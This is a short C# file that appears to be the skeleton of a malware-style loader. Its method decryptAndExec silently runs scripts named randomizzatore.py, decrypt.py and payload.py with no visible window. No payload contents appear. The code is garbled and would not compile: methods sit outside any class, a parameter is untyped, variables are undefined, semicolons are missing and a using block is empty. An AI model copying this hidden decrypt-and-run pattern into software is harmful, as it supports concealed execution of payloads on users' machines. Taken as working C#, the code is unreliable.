using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

namespace Main_Method
{

    public void runPythonScript(filename){
            ProcessStartInfo start = new ProcessStartInfo();
            start.FileName = filename;
            start.Arguments = string.Format("\"{0}\" \"{1}\"", cmd, args);
            start.UseShellExecute = false;// Do not use OS shell
            start.CreateNoWindow = true; // We don't need new window
            start.RedirectStandardOutput = true;// Any output, generated by application will be redirected back
            start.RedirectStandardError = true; // Any error in standard output will be redirected back (for example exceptions)
            using (Process process = Process.Start(start))
    }

    public void decryptAndExec(){
       runPythonScript("randomizzatore.py")
       runPythonScript("decrypt.py")
       runPythonScript("payload.py")
    }



    class Program
    {
        static void Main(string[] args)
        {
           decryptAndExec();
        }
    }
}